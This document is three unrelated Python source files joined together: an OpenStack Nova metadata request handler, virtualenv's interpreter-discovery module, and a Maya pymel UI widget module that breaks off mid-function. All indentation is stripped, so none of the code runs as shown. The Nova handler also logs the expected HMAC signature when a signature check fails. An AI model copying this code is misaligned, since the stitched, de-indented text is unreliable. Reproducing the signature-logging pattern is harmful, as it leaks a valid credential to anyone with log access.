# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Metadata request handler."""
import hashlib
import hmac
import os
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import secretutils as secutils
import six
import webob.dec
import webob.exc
from nova.api.metadata import base
from nova import cache_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.network.neutronv2 import api as neutronapi
from nova import wsgi
CONF = nova.conf.CONF
LOG = logging.getLogger(__name__)
class MetadataRequestHandler(wsgi.Application):
"""Serve metadata."""
def __init__(self):
self._cache = cache_utils.get_client(
expiration_time=CONF.api.metadata_cache_expiration)
if (CONF.neutron.service_metadata_proxy and
not CONF.neutron.metadata_proxy_shared_secret):
LOG.warning("metadata_proxy_shared_secret is not configured, "
"the metadata information returned by the proxy "
"cannot be trusted")
def get_metadata_by_remote_address(self, address):
if not address:
raise exception.FixedIpNotFoundForAddress(address=address)
cache_key = 'metadata-%s' % address
data = self._cache.get(cache_key)
if data:
LOG.debug("Using cached metadata for %s", address)
return data
try:
data = base.get_metadata_by_address(address)
except exception.NotFound:
return None
if CONF.api.metadata_cache_expiration > 0:
self._cache.set(cache_key, data)
return data
def get_metadata_by_instance_id(self, instance_id, address):
cache_key = 'metadata-%s' % instance_id
data = self._cache.get(cache_key)
if data:
LOG.debug("Using cached metadata for instance %s", instance_id)
return data
try:
data = base.get_metadata_by_instance_id(instance_id, address)
except exception.NotFound:
return None
if CONF.api.metadata_cache_expiration > 0:
self._cache.set(cache_key, data)
return data
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
if os.path.normpath(req.path_info) == "/":
resp = base.ec2_md_print(base.VERSIONS + ["latest"])
req.response.body = encodeutils.to_utf8(resp)
req.response.content_type = base.MIME_TYPE_TEXT_PLAIN
return req.response
if CONF.neutron.service_metadata_proxy:
if req.headers.get('X-Metadata-Provider'):
meta_data = self._handle_instance_id_request_from_lb(req)
else:
meta_data = self._handle_instance_id_request(req)
else:
if req.headers.get('X-Instance-ID'):
LOG.warning(
"X-Instance-ID present in request headers. The "
"'service_metadata_proxy' option must be "
"enabled to process this header.")
meta_data = self._handle_remote_ip_request(req)
if meta_data is None:
raise webob.exc.HTTPNotFound()
try:
data = meta_data.lookup(req.path_info)
except base.InvalidMetadataPath:
raise webob.exc.HTTPNotFound()
if callable(data):
return data(req, meta_data)
resp = base.ec2_md_print(data)
req.response.body = encodeutils.to_utf8(resp)
req.response.content_type = meta_data.get_mimetype()
return req.response
def _handle_remote_ip_request(self, req):
remote_address = req.remote_addr
if CONF.api.use_forwarded_for:
remote_address = req.headers.get('X-Forwarded-For', remote_address)
try:
meta_data = self.get_metadata_by_remote_address(remote_address)
except Exception:
LOG.exception('Failed to get metadata for IP %s',
remote_address)
msg = _('An unknown error has occurred. '
'Please try your request again.')
raise webob.exc.HTTPInternalServerError(
explanation=six.text_type(msg))
if meta_data is None:
LOG.error('Failed to get metadata for IP %s: no metadata',
remote_address)
return meta_data
def _handle_instance_id_request(self, req):
instance_id = req.headers.get('X-Instance-ID')
tenant_id = req.headers.get('X-Tenant-ID')
signature = req.headers.get('X-Instance-ID-Signature')
remote_address = req.headers.get('X-Forwarded-For')
# Ensure that only one header was passed
if instance_id is None:
msg = _('X-Instance-ID header is missing from request.')
elif signature is None:
msg = _('X-Instance-ID-Signature header is missing from request.')
elif tenant_id is None:
msg = _('X-Tenant-ID header is missing from request.')
elif not isinstance(instance_id, six.string_types):
msg = _('Multiple X-Instance-ID headers found within request.')
elif not isinstance(tenant_id, six.string_types):
msg = _('Multiple X-Tenant-ID headers found within request.')
else:
msg = None
if msg:
raise webob.exc.HTTPBadRequest(explanation=msg)
self._validate_shared_secret(instance_id, signature,
remote_address)
return self._get_meta_by_instance_id(instance_id, tenant_id,
remote_address)
def _get_instance_id_from_lb(self, provider_id, instance_address):
# We use admin context, admin=True to lookup the
# inter-Edge network port
context = nova_context.get_admin_context()
neutron = neutronapi.get_client(context, admin=True)
# Tenant, instance ids are found in the following method:
# X-Metadata-Provider contains id of the metadata provider, and since
# overlapping networks cannot be connected to the same metadata
# provider, the combo of tenant's instance IP and the metadata
# provider has to be unique.
#
# The networks which are connected to the metadata provider are
# retrieved in the 1st call to neutron.list_subnets()
# In the 2nd call we read the ports which belong to any of the
# networks retrieved above, and have the X-Forwarded-For IP address.
# This combination has to be unique as explained above, and we can
# read the instance_id, tenant_id from that port entry.
# Retrieve networks which are connected to metadata provider
md_subnets = neutron.list_subnets(
context,
advanced_service_providers=[provider_id],
fields=['network_id'])
md_networks = [subnet['network_id']
for subnet in md_subnets['subnets']]
try:
# Retrieve the instance data from the instance's port
instance_data = neutron.list_ports(
context,
fixed_ips='ip_address=' + instance_address,
network_id=md_networks,
fields=['device_id', 'tenant_id'])['ports'][0]
except Exception as e:
LOG.error('Failed to get instance id for metadata '
'request, provider %(provider)s '
'networks %(networks)s '
'requester %(requester)s. Error: %(error)s',
{'provider': provider_id,
'networks': md_networks,
'requester': instance_address,
'error': e})
msg = _('An unknown error has occurred. '
'Please try your request again.')
raise webob.exc.HTTPBadRequest(explanation=msg)
instance_id = instance_data['device_id']
tenant_id = instance_data['tenant_id']
# instance_data is unicode-encoded, while cache_utils doesn't like
# that. Therefore we convert to str
if isinstance(instance_id, six.text_type):
instance_id = instance_id.encode('utf-8')
return instance_id, tenant_id
def _handle_instance_id_request_from_lb(self, req):
remote_address = req.headers.get('X-Forwarded-For')
if remote_address is None:
msg = _('X-Forwarded-For is missing from request.')
raise webob.exc.HTTPBadRequest(explanation=msg)
provider_id = req.headers.get('X-Metadata-Provider')
if provider_id is None:
msg = _('X-Metadata-Provider is missing from request.')
raise webob.exc.HTTPBadRequest(explanation=msg)
instance_address = remote_address.split(',')[0]
# If authentication token is set, authenticate
if CONF.neutron.metadata_proxy_shared_secret:
signature = req.headers.get('X-Metadata-Provider-Signature')
self._validate_shared_secret(provider_id, signature,
instance_address)
instance_id, tenant_id = self._get_instance_id_from_lb(
provider_id, instance_address)
return self._get_meta_by_instance_id(instance_id, tenant_id,
instance_address)
def _validate_shared_secret(self, requestor_id, signature,
requestor_address):
expected_signature = hmac.new(
encodeutils.to_utf8(CONF.neutron.metadata_proxy_shared_secret),
encodeutils.to_utf8(requestor_id),
hashlib.sha256).hexdigest()
if not secutils.constant_time_compare(expected_signature, signature):
if requestor_id:
LOG.warning('X-Instance-ID-Signature: %(signature)s does '
'not match the expected value: '
'%(expected_signature)s for id: '
'%(requestor_id)s. Request From: '
'%(requestor_address)s',
{'signature': signature,
'expected_signature': expected_signature,
'requestor_id': requestor_id,
'requestor_address': requestor_address})
msg = _('Invalid proxy request signature.')
raise webob.exc.HTTPForbidden(explanation=msg)
def _get_meta_by_instance_id(self, instance_id, tenant_id, remote_address):
try:
meta_data = self.get_metadata_by_instance_id(instance_id,
remote_address)
except Exception:
LOG.exception('Failed to get metadata for instance id: %s',
instance_id)
msg = _('An unknown error has occurred. '
'Please try your request again.')
raise webob.exc.HTTPInternalServerError(
explanation=six.text_type(msg))
if meta_data is None:
LOG.error('Failed to get metadata for instance id: %s',
instance_id)
elif meta_data.instance.project_id != tenant_id:
LOG.warning("Tenant_id %(tenant_id)s does not match tenant_id "
"of instance %(instance_id)s.",
{'tenant_id': tenant_id, 'instance_id': instance_id})
# causes a 404 to be raised
meta_data = None
return meta_data
|
|
"""
The PythonInfo contains information about a concrete instance of a Python interpreter
Note: this file is also used to query target interpreters, so can only use standard library methods
"""
from __future__ import absolute_import, print_function
import json
import logging
import os
import platform
import re
import sys
import sysconfig
import warnings
from collections import OrderedDict, namedtuple
from string import digits
VersionInfo = namedtuple("VersionInfo", ["major", "minor", "micro", "releaselevel", "serial"])
def _get_path_extensions():
return list(OrderedDict.fromkeys([""] + os.environ.get("PATHEXT", "").lower().split(os.pathsep)))
EXTENSIONS = _get_path_extensions()
_CONF_VAR_RE = re.compile(r"\{\w+\}")
class PythonInfo(object):
"""Contains information for a Python interpreter"""
def __init__(self):
def u(v):
return v.decode("utf-8") if isinstance(v, bytes) else v
def abs_path(v):
return None if v is None else os.path.abspath(v) # unroll relative elements from path (e.g. ..)
# qualifies the python
self.platform = u(sys.platform)
self.implementation = u(platform.python_implementation())
if self.implementation == "PyPy":
self.pypy_version_info = tuple(u(i) for i in sys.pypy_version_info)
# this is a tuple in earlier, struct later, unify to our own named tuple
self.version_info = VersionInfo(*list(u(i) for i in sys.version_info))
self.architecture = 64 if sys.maxsize > 2 ** 32 else 32
self.version = u(sys.version)
self.os = u(os.name)
# information about the prefix - determines python home
self.prefix = u(abs_path(getattr(sys, "prefix", None))) # prefix we think
self.base_prefix = u(abs_path(getattr(sys, "base_prefix", None))) # venv
self.real_prefix = u(abs_path(getattr(sys, "real_prefix", None))) # old virtualenv
# information about the exec prefix - dynamic stdlib modules
self.base_exec_prefix = u(abs_path(getattr(sys, "base_exec_prefix", None)))
self.exec_prefix = u(abs_path(getattr(sys, "exec_prefix", None)))
self.executable = u(abs_path(sys.executable)) # the executable we were invoked via
self.original_executable = u(abs_path(self.executable)) # the executable as known by the interpreter
self.system_executable = self._fast_get_system_executable() # the executable we are based of (if available)
try:
__import__("venv")
has = True
except ImportError:
has = False
self.has_venv = has
self.path = [u(i) for i in sys.path]
self.file_system_encoding = u(sys.getfilesystemencoding())
self.stdout_encoding = u(getattr(sys.stdout, "encoding", None))
if "venv" in sysconfig.get_scheme_names():
self.sysconfig_scheme = "venv"
self.sysconfig_paths = {
u(i): u(sysconfig.get_path(i, expand=False, scheme="venv")) for i in sysconfig.get_path_names()
}
# we cannot use distutils at all if "venv" exists, distutils don't know it
self.distutils_install = {}
else:
self.sysconfig_scheme = None
self.sysconfig_paths = {u(i): u(sysconfig.get_path(i, expand=False)) for i in sysconfig.get_path_names()}
self.distutils_install = {u(k): u(v) for k, v in self._distutils_install().items()}
# https://bugs.python.org/issue22199
makefile = getattr(sysconfig, "get_makefile_filename", getattr(sysconfig, "_get_makefile_filename", None))
self.sysconfig = {
u(k): u(v)
for k, v in [
# a list of content to store from sysconfig
("makefile_filename", makefile()),
]
if k is not None
}
config_var_keys = set()
for element in self.sysconfig_paths.values():
for k in _CONF_VAR_RE.findall(element):
config_var_keys.add(u(k[1:-1]))
config_var_keys.add("PYTHONFRAMEWORK")
self.sysconfig_vars = {u(i): u(sysconfig.get_config_var(i) or "") for i in config_var_keys}
if self.implementation == "PyPy" and sys.version_info.major == 2:
self.sysconfig_vars[u"implementation_lower"] = u"python"
confs = {k: (self.system_prefix if v.startswith(self.prefix) else v) for k, v in self.sysconfig_vars.items()}
self.system_stdlib = self.sysconfig_path("stdlib", confs)
self.system_stdlib_platform = self.sysconfig_path("platstdlib", confs)
self.max_size = getattr(sys, "maxsize", getattr(sys, "maxint", None))
self._creators = None
def _fast_get_system_executable(self):
"""Try to get the system executable by just looking at properties"""
if self.real_prefix or (
self.base_prefix is not None and self.base_prefix != self.prefix
): # if this is a virtual environment
if self.real_prefix is None:
base_executable = getattr(sys, "_base_executable", None) # some platforms may set this to help us
if base_executable is not None: # use the saved system executable if present
if sys.executable != base_executable: # we know we're in a virtual environment, cannot be us
return base_executable
return None # in this case we just can't tell easily without poking around FS and calling them, bail
# if we're not in a virtual environment, this is already a system python, so return the original executable
# note we must choose the original and not the pure executable as shim scripts might throw us off
return self.original_executable
def install_path(self, key):
result = self.distutils_install.get(key)
if result is None: # use sysconfig if sysconfig_scheme is set or distutils is unavailable
# set prefixes to empty => result is relative from cwd
prefixes = self.prefix, self.exec_prefix, self.base_prefix, self.base_exec_prefix
config_var = {k: "" if v in prefixes else v for k, v in self.sysconfig_vars.items()}
result = self.sysconfig_path(key, config_var=config_var).lstrip(os.sep)
return result
@staticmethod
def _distutils_install():
# use distutils primarily because that's what pip does
# https://github.com/pypa/pip/blob/main/src/pip/_internal/locations.py#L95
# note here we don't import Distribution directly to allow setuptools to patch it
with warnings.catch_warnings(): # disable warning for PEP-632
warnings.simplefilter("ignore")
try:
from distutils import dist
from distutils.command.install import SCHEME_KEYS
except ImportError: # if removed or not installed ignore
return {}
d = dist.Distribution({"script_args": "--no-user-cfg"}) # conf files not parsed so they do not hijack paths
if hasattr(sys, "_framework"):
sys._framework = None # disable macOS static paths for framework
with warnings.catch_warnings(): # disable warning for PEP-632
warnings.simplefilter("ignore")
i = d.get_command_obj("install", create=True)
i.prefix = os.sep # paths generated are relative to prefix that contains the path sep, this makes it relative
i.finalize_options()
result = {key: (getattr(i, "install_{}".format(key))[1:]).lstrip(os.sep) for key in SCHEME_KEYS}
return result
@property
def version_str(self):
return ".".join(str(i) for i in self.version_info[0:3])
@property
def version_release_str(self):
return ".".join(str(i) for i in self.version_info[0:2])
@property
def python_name(self):
version_info = self.version_info
return "python{}.{}".format(version_info.major, version_info.minor)
@property
def is_old_virtualenv(self):
return self.real_prefix is not None
@property
def is_venv(self):
return self.base_prefix is not None and self.version_info.major == 3
def sysconfig_path(self, key, config_var=None, sep=os.sep):
pattern = self.sysconfig_paths[key]
if config_var is None:
config_var = self.sysconfig_vars
else:
base = {k: v for k, v in self.sysconfig_vars.items()}
base.update(config_var)
config_var = base
return pattern.format(**config_var).replace(u"/", sep)
def creators(self, refresh=False):
if self._creators is None or refresh is True:
from ..run.plugin.creators import CreatorSelector
self._creators = CreatorSelector.for_interpreter(self)
return self._creators
@property
def system_include(self):
path = self.sysconfig_path(
"include",
{k: (self.system_prefix if v.startswith(self.prefix) else v) for k, v in self.sysconfig_vars.items()},
)
if not os.path.exists(path): # some broken packaging don't respect the sysconfig, fallback to distutils path
# the pattern include the distribution name too at the end, remove that via the parent call
fallback = os.path.join(self.prefix, os.path.dirname(self.install_path("headers")))
if os.path.exists(fallback):
path = fallback
return path
@property
def system_prefix(self):
return self.real_prefix or self.base_prefix or self.prefix
@property
def system_exec_prefix(self):
return self.real_prefix or self.base_exec_prefix or self.exec_prefix
def __unicode__(self):
content = repr(self)
if sys.version_info == 2:
content = content.decode("utf-8")
return content
def __repr__(self):
return "{}({!r})".format(
self.__class__.__name__,
{k: v for k, v in self.__dict__.items() if not k.startswith("_")},
)
def __str__(self):
content = "{}({})".format(
self.__class__.__name__,
", ".join(
"{}={}".format(k, v)
for k, v in (
("spec", self.spec),
(
"system"
if self.system_executable is not None and self.system_executable != self.executable
else None,
self.system_executable,
),
(
"original"
if (
self.original_executable != self.system_executable
and self.original_executable != self.executable
)
else None,
self.original_executable,
),
("exe", self.executable),
("platform", self.platform),
("version", repr(self.version)),
("encoding_fs_io", "{}-{}".format(self.file_system_encoding, self.stdout_encoding)),
)
if k is not None
),
)
return content
@property
def spec(self):
return "{}{}-{}".format(self.implementation, ".".join(str(i) for i in self.version_info), self.architecture)
@classmethod
def clear_cache(cls, app_data):
# this method is not used by itself, so here and called functions can import stuff locally
from .cached_py_info import clear
clear(app_data)
cls._cache_exe_discovery.clear()
def satisfies(self, spec, impl_must_match):
"""check if a given specification can be satisfied by the this python interpreter instance"""
if spec.path:
if self.executable == os.path.abspath(spec.path):
return True # if the path is a our own executable path we're done
if not spec.is_abs:
# if path set, and is not our original executable name, this does not match
basename = os.path.basename(self.original_executable)
spec_path = spec.path
if sys.platform == "win32":
basename, suffix = os.path.splitext(basename)
if spec_path.endswith(suffix):
spec_path = spec_path[: -len(suffix)]
if basename != spec_path:
return False
if impl_must_match:
if spec.implementation is not None and spec.implementation.lower() != self.implementation.lower():
return False
if spec.architecture is not None and spec.architecture != self.architecture:
return False
for our, req in zip(self.version_info[0:3], (spec.major, spec.minor, spec.micro)):
if req is not None and our is not None and our != req:
return False
return True
_current_system = None
_current = None
@classmethod
def current(cls, app_data=None):
"""
This locates the current host interpreter information. This might be different than what we run into in case
the host python has been upgraded from underneath us.
"""
if cls._current is None:
cls._current = cls.from_exe(sys.executable, app_data, raise_on_error=True, resolve_to_host=False)
return cls._current
@classmethod
def current_system(cls, app_data=None):
"""
This locates the current host interpreter information. This might be different than what we run into in case
the host python has been upgraded from underneath us.
"""
if cls._current_system is None:
cls._current_system = cls.from_exe(sys.executable, app_data, raise_on_error=True, resolve_to_host=True)
return cls._current_system
def _to_json(self):
# don't save calculated paths, as these are non primitive types
return json.dumps(self._to_dict(), indent=2)
def _to_dict(self):
data = {var: (getattr(self, var) if var not in ("_creators",) else None) for var in vars(self)}
# noinspection PyProtectedMember
data["version_info"] = data["version_info"]._asdict() # namedtuple to dictionary
return data
@classmethod
def from_exe(cls, exe, app_data=None, raise_on_error=True, ignore_cache=False, resolve_to_host=True, env=None):
"""Given a path to an executable get the python information"""
# this method is not used by itself, so here and called functions can import stuff locally
from .cached_py_info import from_exe
env = os.environ if env is None else env
proposed = from_exe(cls, app_data, exe, env=env, raise_on_error=raise_on_error, ignore_cache=ignore_cache)
# noinspection PyProtectedMember
if isinstance(proposed, PythonInfo) and resolve_to_host:
try:
proposed = proposed._resolve_to_system(app_data, proposed)
except Exception as exception:
if raise_on_error:
raise exception
logging.info("ignore %s due cannot resolve system due to %r", proposed.original_executable, exception)
proposed = None
return proposed
@classmethod
def _from_json(cls, payload):
# the dictionary unroll here is to protect against pypy bug of interpreter crashing
raw = json.loads(payload)
return cls._from_dict({k: v for k, v in raw.items()})
@classmethod
def _from_dict(cls, data):
data["version_info"] = VersionInfo(**data["version_info"]) # restore this to a named tuple structure
result = cls()
result.__dict__ = {k: v for k, v in data.items()}
return result
@classmethod
def _resolve_to_system(cls, app_data, target):
start_executable = target.executable
prefixes = OrderedDict()
while target.system_executable is None:
prefix = target.real_prefix or target.base_prefix or target.prefix
if prefix in prefixes:
if len(prefixes) == 1:
# if we're linking back to ourselves accept ourselves with a WARNING
logging.info("%r links back to itself via prefixes", target)
target.system_executable = target.executable
break
for at, (p, t) in enumerate(prefixes.items(), start=1):
logging.error("%d: prefix=%s, info=%r", at, p, t)
logging.error("%d: prefix=%s, info=%r", len(prefixes) + 1, prefix, target)
raise RuntimeError("prefixes are causing a circle {}".format("|".join(prefixes.keys())))
prefixes[prefix] = target
target = target.discover_exe(app_data, prefix=prefix, exact=False)
if target.executable != target.system_executable:
target = cls.from_exe(target.system_executable, app_data)
target.executable = start_executable
return target
_cache_exe_discovery = {}
def discover_exe(self, app_data, prefix, exact=True, env=None):
key = prefix, exact
if key in self._cache_exe_discovery and prefix:
logging.debug("discover exe from cache %s - exact %s: %r", prefix, exact, self._cache_exe_discovery[key])
return self._cache_exe_discovery[key]
logging.debug("discover exe for %s in %s", self, prefix)
# we don't know explicitly here, do some guess work - our executable name should tell
possible_names = self._find_possible_exe_names()
possible_folders = self._find_possible_folders(prefix)
discovered = []
env = os.environ if env is None else env
for folder in possible_folders:
for name in possible_names:
info = self._check_exe(app_data, folder, name, exact, discovered, env)
if info is not None:
self._cache_exe_discovery[key] = info
return info
if exact is False and discovered:
info = self._select_most_likely(discovered, self)
folders = os.pathsep.join(possible_folders)
self._cache_exe_discovery[key] = info
logging.debug("no exact match found, chosen most similar of %s within base folders %s", info, folders)
return info
msg = "failed to detect {} in {}".format("|".join(possible_names), os.pathsep.join(possible_folders))
raise RuntimeError(msg)
def _check_exe(self, app_data, folder, name, exact, discovered, env):
exe_path = os.path.join(folder, name)
if not os.path.exists(exe_path):
return None
info = self.from_exe(exe_path, app_data, resolve_to_host=False, raise_on_error=False, env=env)
if info is None: # ignore if for some reason we can't query
return None
for item in ["implementation", "architecture", "version_info"]:
found = getattr(info, item)
searched = getattr(self, item)
if found != searched:
if item == "version_info":
found, searched = ".".join(str(i) for i in found), ".".join(str(i) for i in searched)
executable = info.executable
logging.debug("refused interpreter %s because %s differs %s != %s", executable, item, found, searched)
if exact is False:
discovered.append(info)
break
else:
return info
return None
@staticmethod
def _select_most_likely(discovered, target):
# no exact match found, start relaxing our requirements then to facilitate system package upgrades that
# could cause this (when using copy strategy of the host python)
def sort_by(info):
# we need to setup some priority of traits, this is as follows:
# implementation, major, minor, micro, architecture, tag, serial
matches = [
info.implementation == target.implementation,
info.version_info.major == target.version_info.major,
info.version_info.minor == target.version_info.minor,
info.architecture == target.architecture,
info.version_info.micro == target.version_info.micro,
info.version_info.releaselevel == target.version_info.releaselevel,
info.version_info.serial == target.version_info.serial,
]
priority = sum((1 << pos if match else 0) for pos, match in enumerate(reversed(matches)))
return priority
sorted_discovered = sorted(discovered, key=sort_by, reverse=True) # sort by priority in decreasing order
most_likely = sorted_discovered[0]
return most_likely
def _find_possible_folders(self, inside_folder):
candidate_folder = OrderedDict()
executables = OrderedDict()
executables[os.path.realpath(self.executable)] = None
executables[self.executable] = None
executables[os.path.realpath(self.original_executable)] = None
executables[self.original_executable] = None
for exe in executables.keys():
base = os.path.dirname(exe)
# following path pattern of the current
if base.startswith(self.prefix):
relative = base[len(self.prefix) :]
candidate_folder["{}{}".format(inside_folder, relative)] = None
# or at root level
candidate_folder[inside_folder] = None
return list(i for i in candidate_folder.keys() if os.path.exists(i))
def _find_possible_exe_names(self):
name_candidate = OrderedDict()
for name in self._possible_base():
for at in (3, 2, 1, 0):
version = ".".join(str(i) for i in self.version_info[:at])
for arch in ["-{}".format(self.architecture), ""]:
for ext in EXTENSIONS:
candidate = "{}{}{}{}".format(name, version, arch, ext)
name_candidate[candidate] = None
return list(name_candidate.keys())
def _possible_base(self):
possible_base = OrderedDict()
basename = os.path.splitext(os.path.basename(self.executable))[0].rstrip(digits)
possible_base[basename] = None
possible_base[self.implementation] = None
# python is always the final option as in practice is used by multiple implementation as exe name
if "python" in possible_base:
del possible_base["python"]
possible_base["python"] = None
for base in possible_base:
lower = base.lower()
yield lower
from ..info import fs_is_case_sensitive
if fs_is_case_sensitive():
if base != lower:
yield base
upper = base.upper()
if upper != base:
yield upper
if __name__ == "__main__":
# dump a JSON representation of the current python
# noinspection PyProtectedMember
print(PythonInfo()._to_json())
|
|
__author__ = 'Tom'
import pymel.core as pm
import tb_messages as tb_msg
def intEntered(name, *args):
pm.optionVar(intValue=(str(name), args[0]))
class folder_picker():
def __init__(self):
self.main_layout = pm.formLayout()
self.layout = pm.rowLayout(numberOfColumns=3,
adjustableColumn=2,
columnAlign=[1, 'both'],
columnAttach2=['both', 'left'],
parent=self.main_layout
)
self.label = pm.text(parent=self.layout)
self.label2 = pm.text(parent=self.main_layout)
self.folder_field = pm.textField(parent=self.layout)
self.button = pm.symbolButton(parent=self.layout)
pass
def create(self, parent="", label="", option_variable="", top_form="", top_control=""):
pm.formLayout(self.main_layout, edit=True, parent=parent)
pm.text(self.label2, edit=True, label=label)
pm.rowLayout(self.layout,
parent=self.main_layout
)
pm.text(self.label, edit=True, label="")
pm.textField(self.folder_field,
edit=True,
text=pm.optionVar.get(option_variable, 'c:/qss/')
)
pm.symbolButton(self.button,
edit=True,
image="navButtonBrowse.png",
command=lambda *args: self.set_option_dir(option_variable, self.folder_field, args[0])
)
if top_control:
pm.formLayout(
top_form,
edit=True,
attachControl=[self.main_layout, 'top', 0, top_control],
attachForm=[[self.main_layout, 'left', 0],
[self.main_layout, 'right', 0]]
)
elif top_form:
pm.formLayout(
top_form,
edit=True,
attachForm=[[self.main_layout, 'top', 0],
[self.main_layout, 'left', 0],
[self.main_layout, 'right', 0]]
)
# self.attach_form(self.layout, self.main_layout)
FormAttach().attach(self.layout, self.main_layout)
return self.main_layout
@staticmethod
def pin_to_top(attach_form, form):
pass
@staticmethod
def attach_form(attach_form, form):
af = [[attach_form, 'top', 16],
[attach_form, 'left', 16],
[attach_form, 'right', 16],
[attach_form, 'bottom', 16]
]
pm.formLayout(
form,
edit=True,
attachForm=af
)
@staticmethod
def set_option_dir(_name, _field, *args):
_filter = '*.dir'
_start_dir = pm.optionVar.get(_name, pm.workspace(query=True, directory=True))
_result = pm.fileDialog2(startingDirectory=_start_dir,
fileMode=3,
fileFilter=_filter,
dialogStyle=1,
okCaption='pick')
if _result:
pm.optionVar(stringValue=(_name, _result[0] + "/"))
pm.textField(_field, edit=True, text=_result[0])
return _name
class positionWidget():
def __init__(self):
self.positions = tb_msg.Message().positions
pass
def changed(self, name, *args):
pm.optionVar(stringValue=(str(name), args[0]))
def create(self, name='', label=''):
option_Menu = pm.optionMenu(name,
label=label,
changeCommand=lambda *args: self.changed(name, args[0])
)
for pos in tb_msg.Message().positions:
pm.menuItem(label=pos)
print name
default_value = pm.optionVar.get(name, 'topLeft')
pm.optionMenu(option_Menu, edit=True, select=self.positions.index(default_value) + 1)
# return option_Menu
class option_group():
def __init__(self, columns=3):
self.main_layout = pm.formLayout()
self.sub_frameLayout = pm.frameLayout(parent=self.main_layout,
labelVisible=False,
borderStyle='etchedIn'
)
self.sub_formLayout = pm.formLayout(parent=self.sub_frameLayout)
self.layout = None
self.label = pm.text(parent=self.main_layout)
pm.formLayout(
self.main_layout,
edit=True,
attachForm=[[self.sub_frameLayout, 'top', 24],
[self.sub_frameLayout, 'left', 8],
[self.sub_frameLayout, 'right', 12],
[self.sub_frameLayout, 'bottom', 8]]
)
pm.setParent(self.sub_formLayout)
pass
class optionBox():
def _optionCheckBox(self, name="", label="", annotation="", optionVar="", var_list=[]):
print 'optionVar', optionVar
print 'var list', var_list
print 'label', label
if not pm.optionVar(exists=optionVar):
pm.optionVar(stringValue=(optionVar, var_list[0]))
_optionMenu = pm.optionMenu(label=label, changeCommand=lambda *args: self.option_pressed(name, args[0]))
_optionMenuItems = [pm.menuItem(label=var, parent=_optionMenu) for var in var_list]
pm.optionMenu(_optionMenu, edit=True, select=var_list.index(pm.optionVar.get(optionVar))+1)
return _optionMenu
@staticmethod
def option_pressed(name, *args):
print name, args[0]
pm.optionVar(stringValue=(str(name), args[0]))
def create(self, parent="", label="", columns=3, optionList=[], variable="", positionMenu="", positionLabel="",
messageMenu="", top_form="", top_control="", intField="", intFieldLabel=""):
pm.formLayout(self.main_layout, edit=True, parent=parent)
pm.text(self.label, edit=True, label=label)
if positionMenu:
offset = 1
cLayout = pm.rowLayout(numberOfColumns=3,
adjustableColumn=2,
parent=self.sub_formLayout,
columnAlign=[3, 'right'])
FormAttach().fill_right(cLayout, self.sub_formLayout)
FormAttach().fill_left(cLayout, self.sub_formLayout)
self.layout = pm.rowColumnLayout(numberOfColumns=columns,
columnAlign=[1, 'both'],
parent=cLayout
)
if not isinstance(variable, (list,)):
variable = [variable]
for var in variable:
print 'what', optionList
self.optionBox()._optionCheckBox(optionVar=var,
var_list=optionList,
name=var,
label=var)
'''
if intField:
pm.text(label=intFieldLabel)
pm.intField(parent=self.layout,
width=64,
value=pm.optionVar.get(intField, 2),
changeCommand=lambda *args: intEntered(intField, args[0]))
'''
# spacer
pm.text(label="", parent=cLayout)
if top_control:
pm.formLayout(
top_form,
edit=True,
attachControl=[self.main_layout, 'top', 0, top_control],
attachForm=[[self.main_layout, 'left', 8],
[self.main_layout, 'right', 8]]
)
elif top_form:
pm.formLayout(
top_form,
edit=True,
attachForm=[[self.main_layout, 'top', 24],
[self.main_layout, 'left', 8],
[self.main_layout, 'right', 8]]
)
return self.main_layout
class checkBox_group():
def __init__(self, columns=3):
self.main_layout = pm.formLayout()
self.sub_frameLayout = pm.frameLayout(parent=self.main_layout,
labelVisible=False,
borderStyle='etchedIn'
)
self.sub_formLayout = pm.formLayout(parent=self.sub_frameLayout)
self.layout = None
self.label = pm.text(parent=self.main_layout)
pm.formLayout(
self.main_layout,
edit=True,
attachForm=[[self.sub_frameLayout, 'top', 24],
[self.sub_frameLayout, 'left', 8],
[self.sub_frameLayout, 'right', 12],
[self.sub_frameLayout, 'bottom', 8]]
)
pm.setParent(self.sub_formLayout)
pass
class cBox():
def _optionCheckBox_single(self, name="", label="", annotation="", variable="", defaultValue=False):
print name, pm.optionVar.get(variable)
_checkBox = pm.checkBox(name, label=label,
value=pm.optionVar.get(variable, defaultValue),
annotation=annotation,
align="right",
changeCommand=lambda *args: self.checkBox_pressed(name, args[0])
)
# hacky way to save the value of the checkbox back to the option var
pm.optionVar(intValue=(variable, pm.optionVar.get(variable, defaultValue)))
return _checkBox
@staticmethod
def checkBox_pressed(name, *args):
pm.optionVar(intValue=(str(name), args[0]))
def _optionCheckBox(self, name="", label="", annotation="", variable=""):
var_list = pm.optionVar.get(variable)
if var_list:
value = name in var_list
else:
value = False
_checkBox = pm.checkBox(name, label=label,
value=value,
annotation=annotation,
changeCommand=lambda *args: self.checkBox_pressed_array(variable, name, args[0])
)
return _checkBox
@staticmethod
def checkBox_pressed_array(variable, name, state):
vars = pm.optionVar.get(variable, [''])
if state:
# checkbox ticked, add option to list
if name not in vars:
# not already set in list so add it
pm.optionVar(stringValueAppend=(variable, name))
else:
# checkbox un ticked, remove from list
if name in vars:
pm.optionVar(removeFromArray=(variable, vars.index(name)))
def create(self, parent="", label="", columns=3, optionList=[], variable="", positionMenu="", positionLabel="",
messageMenu="", top_form="", top_control="", intField="", intFieldLabel=""):
pm.formLayout(self.main_layout, edit=True, parent=parent)
pm.text(self.label, edit=True, label=label)
if positionMenu:
offset = 1
cLayout = pm.rowLayout(numberOfColumns=3,
adjustableColumn=2,
parent=self.sub_formLayout,
columnAlign=[3, 'right'])
FormAttach().fill_right(cLayout, self.sub_formLayout)
FormAttach().fill_left(cLayout, self.sub_formLayout)
self.layout = pm.rowColumnLayout(numberOfColumns=columns,
columnAlign=[1, 'both'],
parent=cLayout
)
'''
if not isinstance(variable, (list,)):
variable = [variable]
'''
for options in optionList:
self.cBox()._optionCheckBox(variable=variable,
name=options,
label=options)
if intField:
pm.text(label=intFieldLabel)
pm.intField(parent=self.layout,
width=64,
